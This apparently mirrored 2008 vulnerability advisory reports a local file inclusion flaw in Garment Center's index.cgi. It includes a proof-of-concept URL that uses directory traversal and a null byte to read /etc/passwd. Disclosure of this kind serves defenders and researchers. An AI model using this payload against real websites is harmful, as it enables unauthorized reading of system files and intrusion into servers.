Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18856
HistoryJan 15, 2008 - 12:00 a.m.

Garment Center (index.cgi) Local File Inclusion

2008-01-1500:00:00
vulners.com
10

[+] Discovered by Smasher
[+] WarWolfz Crew.
[+] http://warwolfz.altervista.org/

Hey wassup…i've found a vulnerability in
Garmentcenter in index.cgi…

PoC:

/index.cgi?page=[LFI]

Ex.
http://site(1).com/index.cgi?page=…/…/…/…/…/…/…/…/etc/passwd%00

Regards.
Smasher.